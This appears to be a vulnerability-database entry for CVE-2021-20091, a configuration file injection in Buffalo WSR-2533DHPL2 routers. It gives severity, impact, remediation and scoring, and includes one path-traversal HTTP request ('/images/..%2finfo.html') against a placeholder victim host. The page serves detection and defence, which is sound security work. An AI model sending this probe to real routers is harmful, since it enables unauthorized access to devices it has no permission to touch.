🔙 목록으로 돌아가기

CVE-2021-20091: Buffalo WSR-2533DHPL2 - Configuration File Injection

TitleBuffalo WSR-2533DHPL2 - Configuration File Injection
Authorgy741,pdteam,parth
SeverityHigh
ImpactAn attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router.
RemediationApply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.
CVSS Score8.8
EPSS Score0.8599
CVE IDCVE-2021-20091
Tags cve2021 cve buffalo firmware iot tenable vkev vuln

🔍 Vulnerability Description

The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.

🌐 HTTP Request

GET /images/..%2finfo.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Referer: http://www.victim.com/info.html
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-20091.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-20091.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A